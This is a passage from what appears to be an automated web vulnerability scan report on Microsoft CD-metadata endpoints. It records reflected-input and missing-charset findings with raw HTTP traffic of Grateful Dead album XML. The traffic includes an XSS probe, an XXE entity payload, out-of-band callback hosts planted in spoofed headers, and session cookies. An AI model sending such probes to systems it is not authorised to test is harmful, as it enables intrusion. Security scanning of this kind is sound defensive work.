<text>Grateful Dead</text>
<word>Grateful</word>
<word>Dead</word>
</artist>
<trackNumber>4</trackNumber>
<filename>2-04 China Cat Sunflower.m4a</filename>
<trackDuration>339104</trackDuration>
<bitrate>266408</bitrate>
<drmProtected>0</drmProtected>
<trackRequestID>12</trackRequestID>
</track>
<track>
<title>
<text>Looks Like Rain</text>
<word>Looks</word>
<word>Like</word>
<word>Rain</word>
</title>
<artist>
<text>Grateful Dead</text>
<word>Grateful</word>
<word>Dead</word>
</artist>
<trackNumber>5</trackNumber>
<filename>1-05 Looks Like Rain.m4a</filename>
<trackDuration>518385</trackDuration>
<bitrate>263232</bitrate>
<drmProtected>0</drmProtected>
<trackRequestID>4</trackRequestID>
</track>
<track>
<title>
<text>I Know You Rider</text>
<word>I</word>
<word>Know</word>
<word>You</word>
<word>Rider</word>
</title>
<artist>
<text>Grateful Dead</text>
<word>Grateful</word>
<word>Dead</word>
</artist>
<trackNumber>5</trackNumber>
<filename>2-05 I Know You Rider.m4a</filename>
<trackDuration>327354</trackDuration>
<bitrate>265440</bitrate>
<drmProtected>0</drmProtected>
<trackRequestID>13</trackRequestID>
</track>
<track>
<title>
<text>Tennessee Jed</text>
<word>Tennessee</word>
<word>Jed</word>
</title>
<artist>
<text>Grateful Dead</text>
<word>Grateful</word>
<word>Dead</word>
</artist>
<trackNumber>6</trackNumber>
<filename>1-06 Tennessee Jed.m4a</filename>
<trackDuration>549500</trackDuration>
<bitrate>265832</bitrate>
<drmProtected>0</drmProtected>
<trackRequestID>5</trackRequestID>
</track>
<track>
<title>
<text>China Doll</text>
<word>China</word>
<word>Doll</word>
</title>
<artist>
<text>Grateful Dead</text>
<word>Grateful</word>
<word>Dead</word>
</artist>
<trackNumber>6</trackNumber>
<filename>2-06 China Doll.m4a</filename>
<trackDuration>444360</trackDuration>
<bitrate>272624</bitrate>
<drmProtected>0</drmProtected>
<trackRequestID>14</trackRequestID>
</track>
<track>
<title>
<text>Minglewood Blues</text>
<word>Minglewood</word>
<word>Blues</word>
</title>
<artist>
<text>Grateful Dead</text>
<word>Grateful</word>
<word>Dead</word>
</artist>
<trackNumber>7</trackNumber>
<filename>1-07 Minglewood Blues.m4a</filename>
<trackDuration>365342</trackDuration>
<bitrate>266128</bitrate>
<drmProtected>0</drmProtected>
<trackRequestID>6</trackRequestID>
</track>
<track>
<title>
<text>Playing Jam</text>
<word>Playing</word>
<word>Jam</word>
</title>
<artist>
<text>Grateful Dead</text>
<word>Grateful</word>
<word>Dead</word>
</artist>
<trackNumber>7</trackNumber>
<filename>2-07 Playing Jam.m4a</filename>
<trackDuration>100147</trackDuration>
<bitrate>267128</bitrate>
<drmProtected>0</drmProtected>
<trackRequestID>15</trackRequestID>
</track>
<track>
<title>
<text>Sugaree</text>
<word>Sugaree</word>
</title>
<artist>
<text>Grateful Dead</text>
<word>Grateful</word>
<word>Dead</word>
</artist>
<trackNumber>8</trackNumber>
<filename>1-08 Sugaree.m4a</filename>
<trackDuration>858697</trackDuration>
<bitrate>265848</bitrate>
<drmProtected>0</drmProtected>
<trackRequestID>7</trackRequestID>
</track>
<track>
<title>
<text>Drums</text>
<word>Drums</word>
</title>
<artist>
<text>Grateful Dead</text>
<word>Grateful</word>
<word>Dead</word>
</artist>
<trackNumber>8</trackNumber>
<filename>2-08 Drums.m4a</filename>
<trackDuration>159196</trackDuration>
<bitrate>266240</bitrate>
<drmProtected>0</drmProtected>
<trackRequestID>16</trackRequestID>
</track>
<track>
<title>
<text>Promised Land</text>
<word>Promised</word>
<word>Land</word>
</title>
<artist>
<text>Grateful Dead</text>
<word>Grateful</word>
<word>Dead</word>
</artist>
<trackNumber>9</trackNumber>
<filename>1-09 Promised Land.m4a</filename>
<trackDuration>275249</trackDuration>
<bitrate>267664</bitrate>
<drmProtected>0</drmProtected>
<trackRequestID>8</trackRequestID>
</track>
<track>
<title>
<text>Not Fade Away</text>
<word>Not</word>
<word>Fade</word>
<word>Away</word>
</title>
<artist>
<text>Grateful Dead</text>
<word>Grateful</word>
<word>Dead</word>
</artist>
<trackNumber>9</trackNumber>
<filename>2-09 Not Fade Away.m4a</filename>
<trackDuration>605390</trackDuration>
<bitrate>267344</bitrate>
<drmProtected>0</drmProtected>
<trackRequestID>17</trackRequestID>
</track>
<track>
<title>
<text>Playing In the Band</text>
<word>Playing</word>
<word>In</word>
<word>the</word>
<word>Band</word>
</title>
<artist>
<text>Grateful Dead</text>
<word>Grateful</word>
<word>Dead</word>
</artist>
<trackNumber>10</trackNumber>
<filename>2-10 Playing In the Band.m4a</filename>
<trackDuration>288577</trackDuration>
<bitrate>259960</bitrate>
<drmProtected>0</drmProtected>
<trackRequestID>18</trackRequestID>
</track>
</MDQ-CD>
</METADATA>

Response 1

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/xml; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Mon, 04 Sep 2017 00:06:53 GMT
Connection: close

<METADATA><mdqRequestID>FF34CE75-F501-425D-9875-22E0448CCF04v2z4i<a xmlns:a='http://www.w3.org/1999/xhtml'><a:body onload='alert(1)'/></a>u0unconqjbn</mdqRequestID><ResponseCode>Error: Query String has a bad format.</ResponseCode><ResponseCode>Guid should contain 32 digits with 4 dashes (xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx).</ResponseCode><Backoff><Time>15</Time></Backoff><L2Threshold>0.14</L2Threshold></METADATA>

13. Input returned in response (reflected)
Previous Next

There are 3 instances of this issue:

/cdinfo/GetMDRCDPOSTURL.aspx [locale parameter]
/cdinfo/getmdrcd.aspx [manual insertion point 1]
/cdinfo/getmdrcd.aspx [requestID parameter]

Issue background

Reflection of input arises when data is copied from a request and echoed into the application's immediate response.

Input being returned in application responses is not a vulnerability in its own right. However, it is a prerequisite for many client-side vulnerabilities, including cross-site scripting, open redirection, content spoofing, and response header injection. Additionally, some server-side vulnerabilities such as SQL injection are often easier to identify and exploit when input is returned in responses. In applications where input retrieval is rare and the environment is resistant to automated testing (for example, due to a web application firewall), it might be worth subjecting instances of it to focused manual testing.

Vulnerability classifications

13.1. http://info.music.metaservices.microsoft.com/cdinfo/GetMDRCDPOSTURL.aspx [locale parameter]
Previous Next

Summary

	Severity:	Information
	Confidence:	Certain
	Host:	http://info.music.metaservices.microsoft.com
	Path:	/cdinfo/GetMDRCDPOSTURL.aspx

Issue detail

The value of the locale request parameter is copied into the application's response.

Request 1

GET /cdinfo/GetMDRCDPOSTURL.aspx?locale=409f6c4r1ku0a&geoid=f4&version=12.0.15063.0&userlocale=409&requestID=01D6306F-D2BB-4CAD-8CAC-B7D78131197F HTTP/1.1
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36 root@5tzejey2gea7inz7yxvjlb4uglmcfbkz9.burpcollaborator.net
Accept-Encoding: gzip, deflate
Host: info.music.metaservices.microsoft.com
Cookie: SRCHD=AF=NOFORM; SRCHUSR=DOB=20151220; MC1=GUID=94a17c0c597ec54098247c7196d50443&HASH=0c7c&LV=201512&V=4&LU=1450813225752; A=I&I=AxUFAAAAAACCBwAAYLXT4lJLlqvfrKeD0cr3cw!!&V=4
Connection: close
Cache-Control: no-transform
Referer: http://cxdlnl29kleemu3e24zqpi81ksqjjig65.burpcollaborator.net/ref
X-Real-IP: spoofed.el3nbnqb8n2gawrgq6nsdkw38uel7k58u.burpcollaborator.net
Forwarded: for=spoofed.aq4jgjv7dj7cfswcv2soig1zdqjhcgb40.burpcollaborator.net;by=spoofed.aq4jgjv7dj7cfswcv2soig1zdqjhcgb40.burpcollaborator.net;host=spoofed.aq4jgjv7dj7cfswcv2soig1zdqjhcgb40.burpcollaborator.net
X-Forwarded-For: spoofed.qkezazpn7z1s98qspim4cwvf76dx6w6kv.burpcollaborator.net
Contact: root@bbqk1kg8yksd0thdg3dp3hm0yr4ixhy5n.burpcollaborator.net
From: root@rvq0l00oi0ctk91t0jx5nx6gi7oyhxjl8.burpcollaborator.net
True-Client-IP: spoofed.jwjsms1gjsdll12l1byxop78jzpqiplda.burpcollaborator.net
X-Wap-Profile: http://468dwdb1tdn6vmc6bw8iyahttkzbsawyl.burpcollaborator.net/wap.xml
Client-ip: spoofed.fm5ocorc9o3hbxshr7otelx49vfm8myan.burpcollaborator.net

Response 1

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Sun, 10 Sep 2017 20:46:52 GMT
Connection: close
Content-Length: 178

http://info.music.metaservices.microsoft.com/cdinfo/getmdrcd.aspx?locale=409f6c4r1ku0a&geoid=f4&version=12.0.15063.0&userlocale=409&requestID=01D6306F-D2BB-4CAD-8CAC-B7D78131197F

13.2. http://info.music.metaservices.microsoft.com/cdinfo/getmdrcd.aspx [manual insertion point 1]
Previous Next

Summary

	Severity:	Information
	Confidence:	Certain
	Host:	http://info.music.metaservices.microsoft.com
	Path:	/cdinfo/getmdrcd.aspx

Issue detail

The value of manual insertion point 1 is copied into the application's response.

Request 1

POST /cdinfo/getmdrcd.aspx?locale=409&geoid=f4&version=12.0.15063.0&userlocale=409&requestID=CBE2B824-3137-46F9-BB77-34691DDF35AC&requestid=wrtqvetcav40wshz8f&guhpem18=1&t2bk8=1&sru9xawdeh0=1 HTTP/1.1
Accept: */*
Content-Type: text/xml
Accept-Encoding: gzip, deflate
Content-Length: 152
Host: info.music.metaservices.microsoft.com
Pragma: no-cache
Connection: close

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "\\localhost\IPC$" >]>
<foo>&xxe;</foo>

Response 1

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/xml; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Sat, 15 Dec 2018 19:24:35 GMT
Connection: close

<METADATA><mdqRequestID>CBE2B824-3137-46F9-BB77-34691DDF35AC,wrtqvetcav40wshz8f</mdqRequestID><ResponseCode>Error: Query String has a bad format.</ResponseCode><ResponseCode>Guid should contain 32 digits with 4 dashes (xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx).</ResponseCode><Backoff><Time>15</Time></Backoff><L2Threshold>0.14</L2Threshold></METADATA>

13.3. http://info.music.metaservices.microsoft.com/cdinfo/getmdrcd.aspx [requestID parameter]
Previous Next

Summary

	Severity:	Information
	Confidence:	Certain
	Host:	http://info.music.metaservices.microsoft.com
	Path:	/cdinfo/getmdrcd.aspx

Issue detail

The value of the requestID request parameter is copied into the application's response.

Request 1

POST /cdinfo/getmdrcd.aspx?locale=409&geoid=f4&version=12.0.15063.0&userlocale=409&requestID=FF34CE75-F501-425D-9875-22E0448CCF04pt2numr3tl HTTP/1.1
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36 root@c3gltl89qlkesu9e845qvie1qswnsqgf.burpcollaborator.net
Content-Type: text/xml
Accept-Encoding: gzip, deflate
Content-Length: 15236
Host: info.music.metaservices.microsoft.com
Pragma: no-cache
Cookie: SRCHD=AF=NOFORM; SRCHUSR=DOB=20151220; MC1=GUID=94a17c0c597ec54098247c7196d50443&HASH=0c7c&LV=201512&V=4&LU=1450813225752; A=I&I=AxUFAAAAAACCBwAAYLXT4lJLlqvfrKeD0cr3cw!!&V=4
Connection: close
Cache-Control: no-transform
Referer: http://em4ncnrb9n3gbwsgr6osekx39ufpbkz9.burpcollaborator.net/ref
X-Real-IP: spoofed.b3fktk88qkkdst9d835pvhe0qrwmsig7.burpcollaborator.net
Forwarded: for=spoofed.7rzghgw4eg89gpx9wztljd2wenkigf44.burpcollaborator.net;by=spoofed.7rzghgw4eg89gpx9wztljd2wenkigf44.burpcollaborator.net;host=spoofed.7rzghgw4eg89gpx9wztljd2wenkigf44.burpcollaborator.net
X-Forwarded-For: spoofed.j8ssysdgvsplx1eldbax0pj8vz1uxslh.burpcollaborator.net
Contact: root@bydkok38lkfdnt4d330pqh90lrrmnlba.burpcollaborator.net
From: root@axbjnj27kjecms3c22zopg8zkqqlmlaa.burpcollaborator.net
True-Client-IP: spoofed.wss5i5xtf59yheyyxouak23lfcl7h85x.burpcollaborator.net
X-Wap-Profile: http://gl5pbpqd8p2iayriq8nudmw58weratyi.burpcollaborator.net/wap.xml
Client-ip: spoofed.4pudfdu1cd66emv6uwriha0tckifej28.burpcollaborator.net

<METADATA>
<MDQ-CD>
<mdqRequestID>FF34CE75-F501-425D-9875-22E0448CCF04</mdqRequestID>
<album>
<title>
<text>Dick's Picks, Vol. 10: Winterland Arena, San Francisco, CA 12/29/77</text>
<word>Dicks</word>
<word>Picks</word>
<word>Vol</word>
<word>10</word>
<word>Winterland</word>
<word>Arena</word>
<word>San</word>
<word>Francisco</word>
<word>CA</word>
<word>12</word>
<word>29</word>
<word>77</word>
</title>
<artist>
<text>Grateful Dead</text>
<word>Grateful</word>
<word>Dead</word>
</artist>
</album>
<track>
<title>
<text>Jack Straw</text>
<word>Jack</word>
<word>Straw</word>
</title>
<artist>
<text>Grateful Dead</text>
<word>Grateful</word>
<word>Dead</word>
</artist>
<trackNumber>1</trackNumber>
<filename>1-01 Jack Straw.m4a</filename>
<trackDuration>425877</trackDuration>
<bitrate>265760</bitrate>
<drmProtected>0</drmProtected>
<trackRequestID>0</trackRequestID>
</track>
<track>
<title>
<text>Bertha</text>
<word>Bertha</word>
</title>
<artist>
<text>Grateful Dead</text>
<word>Grateful</word>
<word>Dead</word>
</artist>
<trackNumber>1</trackNumber>
<filename>2-01 Bertha.m4a</filename>
<trackDuration>441620</trackDuration>
<bitrate>270320</bitrate>
<drmProtected>0</drmProtected>
<trackRequestID>9</trackRequestID>
</track>
<track>
<title>
<text>Terrapin Station</text>
<word>Terrapin</word>
<word>Station</word>
</title>
<artist>
<text>Grateful Dead</text>
<word>Grateful</word>
<word>Dead</word>
</artist>
<trackNumber>1</trackNumber>
<filename>3-01 Terrapin Station.m4a</filename>
<trackDuration>629121</trackDuration>
<bitrate>267344</bitrate>
<drmProtected>0</drmProtected>
<trackRequestID>19</trackRequestID>
</track>
<track>
<title>
<text>They Love Each Other</text>
<word>They</word>
<word>Love</word>
<word>Each</word>
<word>Other</word>
</title>
<artist>
<text>Grateful Dead</text>
<word>Grateful</word>
<word>Dead</word>
</artist>
<trackNumber>2</trackNumber>
<filename>1-02 They Love Each Other.m4a</filename>
<trackDuration>465002</trackDuration>
<bitrate>265704</bitrate>
<drmProtected>0</drmProtected>
<trackRequestID>1</trackRequestID>
</track>
<track>
<title>
<text>Good Lovin'</text>
<word>Good</word>
<word>Lovin</word>
</title>
<artist>
<text>Grateful Dead</text>
<word>Grateful</word>
<word>Dead</word>
</artist>
<trackNumber>2</trackNumber>
<filename>2-02 Good Lovin'.m4a</filename>
<trackDuration>410668</trackDuration>
<bitrate>264640</bitrate>
<drmProtected>0</drmProtected>
<trackRequestID>10</trackRequestID>
</track>
<track>
<title>
<text>Johnny B. Goode</text>
<word>Johnny</word>
<word>B</word>
<word>Goode</word>
</title>
<artist>
<text>Grateful Dead</text>
<word>Grateful</word>
<word>Dead</word>
</artist>
<trackNumber>2</trackNumber>
<filename>3-02 Johnny B. Goode.m4a</filename>
<trackDuration>273995</trackDuration>
<bitrate>263176</bitrate>
<drmProtected>0</drmProtected>
<trackRequestID>20</trackRequestID>
</track>
<track>
<title>
<text>Mama Tried</text>
<word>Mama</word>
<word>Tried</word>
</title>
<artist>
<text>Grateful Dead</text>
<word>Grateful</word>
<word>Dead</word>
</artist>
<trackNumber>3</trackNumber>
<filename>1-03 Mama Tried.m4a</filename>
<trackDuration>228623</trackDuration>
<bitrate>262224</bitrate>
<drmProtected>0</drmProtected>
<trackRequestID>2</trackRequestID>
</track>
<track>
<title>
<text>Playing In the Band</text>
<word>Playing</word>
<word>In</word>
<word>the</word>
<word>Band</word>
</title>
<artist>
<text>Grateful Dead</text>
<word>Grateful</word>
<word>Dead</word>
</artist>
<trackNumber>3</trackNumber>
<filename>2-03 Playing In the Band.m4a</filename>
<trackDuration>948186</trackDuration>
<bitrate>267000</bitrate>
<drmProtected>0</drmProtected>
<trackRequestID>11</trackRequestID>
</track>
<track>
<title>
<text>Estimated Prophet</text>
<word>Estimated</word>
<word>Prophet</word>
</title>
<artist>
<text>Grateful Dead</text>
<word>Grateful</word>
<word>Dead</word>
</artist>
<trackNumber>3</trackNumber>
<filename>3-03 Estimated Prophet.m4a</filename>
<trackDuration>646698</trackDuration>
<bitrate>263896</bitrate>
<drmProtected>0</drmProtected>
<trackRequestID>21</trackRequestID>
</track>
<track>
<title>
<text>Loser</text>
<word>Loser</word>
</title>
<artist>
<text>Grateful Dead</text>
<word>Grateful</word>
<word>Dead</word>
</artist>
<trackNumber>4</trackNumber>
<filename>1-04 Loser.m4a</filename>
<trackDuration>509956</trackDuration>
<bitrate>262912</bitrate>
<drmProtected>0</drmProtected>
<trackRequestID>3</trackRequestID>
</track>
<track>
<title>
<text>China Cat Sunflower</text>
<word>China</word>
<word>Cat</word>
<word>Sunflower</word>
</title>
<artist>
<text>Grateful Dead</text>
<word>Grateful</word>
<word>Dead</word>
</artist>
<trackNumber>4</trackNumber>
<filename>2-04 China Cat Sunflower.m4a</filename>
<trackDuration>339104</trackDuration>
<bitrate>266408</bitrate>
<drmProtected>0</drmProtected>
<trackRequestID>12</trackRequestID>
</track>
<track>
<title>
<text>Looks Like Rain</text>
<word>Looks</word>
<word>Like</word>
<word>Rain</word>
</title>
<artist>
<text>Grateful Dead</text>
<word>Grateful</word>
<word>Dead</word>
</artist>
<trackNumber>5</trackNumber>
<filename>1-05 Looks Like Rain.m4a</filename>
<trackDuration>518385</trackDuration>
<bitrate>263232</bitrate>
<drmProtected>0</drmProtected>
<trackRequestID>4</trackRequestID>
</track>
<track>
<title>
<text>I Know You Rider</text>
<word>I</word>
<word>Know</word>
<word>You</word>
<word>Rider</word>
</title>
<artist>
<text>Grateful Dead</text>
<word>Grateful</word>
<word>Dead</word>
</artist>
<trackNumber>5</trackNumber>
<filename>2-05 I Know You Rider.m4a</filename>
<trackDuration>327354</trackDuration>
<bitrate>265440</bitrate>
<drmProtected>0</drmProtected>
<trackRequestID>13</trackRequestID>
</track>
<track>
<title>
<text>Tennessee Jed</text>
<word>Tennessee</word>
<word>Jed</word>
</title>
<artist>
<text>Grateful Dead</text>
<word>Grateful</word>
<word>Dead</word>
</artist>
<trackNumber>6</trackNumber>
<filename>1-06 Tennessee Jed.m4a</filename>
<trackDuration>549500</trackDuration>
<bitrate>265832</bitrate>
<drmProtected>0</drmProtected>
<trackRequestID>5</trackRequestID>
</track>
<track>
<title>
<text>China Doll</text>
<word>China</word>
<word>Doll</word>
</title>
<artist>
<text>Grateful Dead</text>
<word>Grateful</word>
<word>Dead</word>
</artist>
<trackNumber>6</trackNumber>
<filename>2-06 China Doll.m4a</filename>
<trackDuration>444360</trackDuration>
<bitrate>272624</bitrate>
<drmProtected>0</drmProtected>
<trackRequestID>14</trackRequestID>
</track>
<track>
<title>
<text>Minglewood Blues</text>
<word>Minglewood</word>
<word>Blues</word>
</title>
<artist>
<text>Grateful Dead</text>
<word>Grateful</word>
<word>Dead</word>
</artist>
<trackNumber>7</trackNumber>
<filename>1-07 Minglewood Blues.m4a</filename>
<trackDuration>365342</trackDuration>
<bitrate>266128</bitrate>
<drmProtected>0</drmProtected>
<trackRequestID>6</trackRequestID>
</track>
<track>
<title>
<text>Playing Jam</text>
<word>Playing</word>
<word>Jam</word>
</title>
<artist>
<text>Grateful Dead</text>
<word>Grateful</word>
<word>Dead</word>
</artist>
<trackNumber>7</trackNumber>
<filename>2-07 Playing Jam.m4a</filename>
<trackDuration>100147</trackDuration>
<bitrate>267128</bitrate>
<drmProtected>0</drmProtected>
<trackRequestID>15</trackRequestID>
</track>
<track>
<title>
<text>Sugaree</text>
<word>Sugaree</word>
</title>
<artist>
<text>Grateful Dead</text>
<word>Grateful</word>
<word>Dead</word>
</artist>
<trackNumber>8</trackNumber>
<filename>1-08 Sugaree.m4a</filename>
<trackDuration>858697</trackDuration>
<bitrate>265848</bitrate>
<drmProtected>0</drmProtected>
<trackRequestID>7</trackRequestID>
</track>
<track>
<title>
<text>Drums</text>
<word>Drums</word>
</title>
<artist>
<text>Grateful Dead</text>
<word>Grateful</word>
<word>Dead</word>
</artist>
<trackNumber>8</trackNumber>
<filename>2-08 Drums.m4a</filename>
<trackDuration>159196</trackDuration>
<bitrate>266240</bitrate>
<drmProtected>0</drmProtected>
<trackRequestID>16</trackRequestID>
</track>
<track>
<title>
<text>Promised Land</text>
<word>Promised</word>
<word>Land</word>
</title>
<artist>
<text>Grateful Dead</text>
<word>Grateful</word>
<word>Dead</word>
</artist>
<trackNumber>9</trackNumber>
<filename>1-09 Promised Land.m4a</filename>
<trackDuration>275249</trackDuration>
<bitrate>267664</bitrate>
<drmProtected>0</drmProtected>
<trackRequestID>8</trackRequestID>
</track>
<track>
<title>
<text>Not Fade Away</text>
<word>Not</word>
<word>Fade</word>
<word>Away</word>
</title>
<artist>
<text>Grateful Dead</text>
<word>Grateful</word>
<word>Dead</word>
</artist>
<trackNumber>9</trackNumber>
<filename>2-09 Not Fade Away.m4a</filename>
<trackDuration>605390</trackDuration>
<bitrate>267344</bitrate>
<drmProtected>0</drmProtected>
<trackRequestID>17</trackRequestID>
</track>
<track>
<title>
<text>Playing In the Band</text>
<word>Playing</word>
<word>In</word>
<word>the</word>
<word>Band</word>
</title>
<artist>
<text>Grateful Dead</text>
<word>Grateful</word>
<word>Dead</word>
</artist>
<trackNumber>10</trackNumber>
<filename>2-10 Playing In the Band.m4a</filename>
<trackDuration>288577</trackDuration>
<bitrate>259960</bitrate>
<drmProtected>0</drmProtected>
<trackRequestID>18</trackRequestID>
</track>
</MDQ-CD>
</METADATA>

Response 1

14. HTML does not specify charset
Previous

There are 2 instances of this issue:

/a'a%5c'b%22c%3e%3f%3e%25%7d%7d%25%25%3ec%3c[[%3f$%7b%7b%25%7d%7dcake%5c/getmdrcd.aspx
/cdinfo/getmdrcd.aspx

Issue description

If a response states that it contains HTML content but does not specify a character set, then the browser may analyze the HTML and attempt to determine which character set it appears to be using. Even if the majority of the HTML actually employs a standard character set such as UTF-8, the presence of non-standard characters anywhere in the response may cause the browser to interpret the content using a different character set. This can have unexpected results, and can lead to cross-site scripting vulnerabilities in which non-standard encodings like UTF-7 can be used to bypass the application's defensive filters.

In most cases, the absence of a charset directive does not constitute a security flaw, particularly if the response contains static content. You should review the contents of affected responses, and the context in which they appear, to determine whether any vulnerability exists.

Issue remediation

For every response containing HTML content, the application should include within the Content-type header a directive specifying a standard recognized character set, for example charset=ISO-8859-1.

Vulnerability classifications

14.1. http://info.music.metaservices.microsoft.com/a'a%5c'b%22c%3e%3f%3e%25%7d%7d%25%25%3ec%3c[[%3f$%7b%7b%25%7d%7dcake%5c/getmdrcd.aspx
Previous Next

Summary

	Severity:	Information
	Confidence:	Certain
	Host:	http://info.music.metaservices.microsoft.com
	Path:	/a'a%5c'b%22c%3e%3f%3e%25%7d%7d%25%25%3ec%3c[[%3f$%7b%7b%25%7d%7dcake%5c/getmdrcd.aspx

Request 1

Response 1

HTTP/1.1 400 Bad Request
Content-Type: text/html
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Fri, 08 Sep 2017 18:23:03 GMT
Connection: close
Content-Length: 11

Bad Request

14.2. http://info.music.metaservices.microsoft.com/cdinfo/getmdrcd.aspx
Previous

Summary

	Severity:	Information
	Confidence:	Certain
	Host:	http://info.music.metaservices.microsoft.com
	Path:	/cdinfo/getmdrcd.aspx

Request 1

POST /cdinfo/getmdrcd.aspx?locale=409&geoid=f4&version=12.0.15063.0&userlocale=409&requestID=FF34CE75-F501-425D-9875-22E0448CCF04 HTTP/1.1
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36 root@c3gltl89qlkesu9e845qvie1qswnsqgf.burpcollaborator.net
Content-Type: text/xml
Accept-Encoding: gzip, deflate
Content-Length: 15260
Host: info.music.metaservices.microsoft.com
Pragma: no-cache
Cookie: SRCHD=AF=NOFORM; SRCHUSR=DOB=20151220; MC1=GUID=94a17c0c597ec54098247c7196d50443&HASH=0c7c&LV=201512&V=4&LU=1450813225752; A=I&I=AxUFAAAAAACCBwAAYLXT4lJLlqvfrKeD0cr3cw!!&V=4
Connection: close
Cache-Control: no-transform
Referer: http://em4ncnrb9n3gbwsgr6osekx39ufpbkz9.burpcollaborator.net/ref
X-Real-IP: spoofed.b3fktk88qkkdst9d835pvhe0qrwmsig7.burpcollaborator.net
Forwarded: for=spoofed.7rzghgw4eg89gpx9wztljd2wenkigf44.burpcollaborator.net;by=spoofed.7rzghgw4eg89gpx9wztljd2wenkigf44.burpcollaborator.net;host=spoofed.7rzghgw4eg89gpx9wztljd2wenkigf44.burpcollaborator.net
X-Forwarded-For: spoofed.j8ssysdgvsplx1eldbax0pj8vz1uxslh.burpcollaborator.net
Contact: root@bydkok38lkfdnt4d330pqh90lrrmnlba.burpcollaborator.net
From: root@axbjnj27kjecms3c22zopg8zkqqlmlaa.burpcollaborator.net
True-Client-IP: spoofed.wss5i5xtf59yheyyxouak23lfcl7h85x.burpcollaborator.net
X-Wap-Profile: http://gl5pbpqd8p2iayriq8nudmw58weratyi.burpcollaborator.net/wap.xml
Client-ip: spoofed.4pudfdu1cd66emv6uwriha0tckifej28.burpcollaborator.net

<METADATA>
<MDQ-CD>
<mdqRequestID>a'a\'b"c>?>%}}%%>c<[[?${{%}}cake\</mdqRequestID>
<album>
<title>
<text>Dick's Picks, Vol. 10: Winterland Arena, San Francisco, CA 12/29/77</text>
<word>Dicks</word>
<word>Picks</word>
<word>Vol</word>
<word>10</word>
<word>Winterland</word>
<word>Arena</word>
<word>San</word>
<word>Francisco</word>
<word>CA</word>
<word>12</word>
<word>29</word>
<word>77</word>
</title>
<artist>
<text>Grateful Dead</text>
<word>Grateful</word>
<word>Dead</word>
</artist>
</album>
<track>
<title>
<text>Jack Straw</text>
<word>Jack</word>
<word>Straw</word>
</title>
<artist>
<text>Grateful Dead</text>
<word>Grateful</word>
<word>Dead</word>
</artist>
<trackNumber>1</trackNumber>
<filename>1-01 Jack Straw.m4a</filename>
<trackDuration>425877</trackDuration>
<bitrate>265760</bitrate>
<drmProtected>0</drmProtected>
<trackRequestID>0</trackRequestID>
</track>
<track>
<title>
<text>Bertha</text>
<word>Bertha</word>
</title>
<artist>
<text>Grateful Dead</text>
<word>Grateful</word>
<word>Dead</word>
</artist>
<trackNumber>1</trackNumber>
<filename>2-01 Bertha.m4a</filename>
<trackDuration>441620</trackDuration>
<bitrate>270320</bitrate>
<drmProtected>0</drmProtected>
<trackRequestID>9</trackRequestID>
</track>
<track>
<title>
<text>Terrapin Station</text>
<word>Terrapin</word>
<word>Station</word>
</title>
<artist>
<text>Grateful Dead</text>
<word>Grateful</word>
<word>Dead</word>
</artist>
<trackNumber>1</trackNumber>
<filename>3-01 Terrapin Station.m4a</filename>
<trackDuration>629121</trackDuration>
<bitrate>267344</bitrate>
<drmProtected>0</drmProtected>
<trackRequestID>19</trackRequestID>
</track>
<track>
<title>
<text>They Love Each Other</text>
<word>They</word>
<word>Love</word>
<word>Each</word>
<word>Other</word>
</title>
<artist>
<text>Grateful Dead</text>
<word>Grateful</word>
<word>Dead</word>
</artist>
<trackNumber>2</trackNumber>
<filename>1-02 They Love Each Other.m4a</filename>
<trackDuration>465002</trackDuration>
<bitrate>265704</bitrate>
<drmProtected>0</drmProtected>
<trackRequestID>1</trackRequestID>
</track>
<track>
<title>
<text>Good Lovin'</text>
<word>Good</word>
<word>Lovin</word>
</title>
<artist>
<text>Grateful Dead</text>
<word>Grateful</word>
<word>Dead</word>
</artist>
<trackNumber>2</trackNumber>
<filename>2-02 Good Lovin'.m4a</filename>
<trackDuration>410668</trackDuration>
<bitrate>264640</bitrate>
<drmProtected>0</drmProtected>
<trackRequestID>10</trackRequestID>
</track>
<track>
<title>
<text>Johnny B. Goode</text>
<word>Johnny</word>
<word>B</word>
<word>Goode</word>
</title>
<artist>
<text>Grateful Dead</text>
<word>Grateful</word>
<word>Dead</word>
</artist>
<trackNumber>2</trackNumber>
<filename>3-02 Johnny B. Goode.m4a</filename>
<trackDuration>273995</trackDuration>
<bitrate>263176</bitrate>
<drmProtected>0</drmProtected>
<trackRequestID>20</trackRequestID>
</track>
<track>
<title>
<text>Mama Tried</text>
<word>Mama</word>
<word>Tried</word>
</title>
<artist>
<text>Grateful Dead</text>
<word>Grateful</word>
<word>Dead</word>
</artist>
<trackNumber>3</trackNumber>
<filename>1-03 Mama Tried.m4a</filename>
<trackDuration>228623</trackDuration>
<bitrate>262224</bitrate>
<drmProtected>0</drmProtected>
<trackRequestID>2</trackRequestID>
</track>
<track>
<title>
<text>Playing In the Band</text>
<word>Playing</word>
<word>In</word>
<word>the</word>
<word>Band</word>
</title>
<artist>
<text>Grateful Dead</text>
<word>Grateful</word>
<word>Dead</word>
</artist>
<trackNumber>3</trackNumber>
<filename>2-03 Playing In the Band.m4a</filename>
<trackDuration>948186</trackDuration>
<bitrate>267000</bitrate>
<drmProtected>0</drmProtected>
<trackRequestID>11</trackRequestID>
</track>
<track>
<title>
<text>Estimated Prophet</text>
<word>Estimated</word>
<word>Prophet</word>
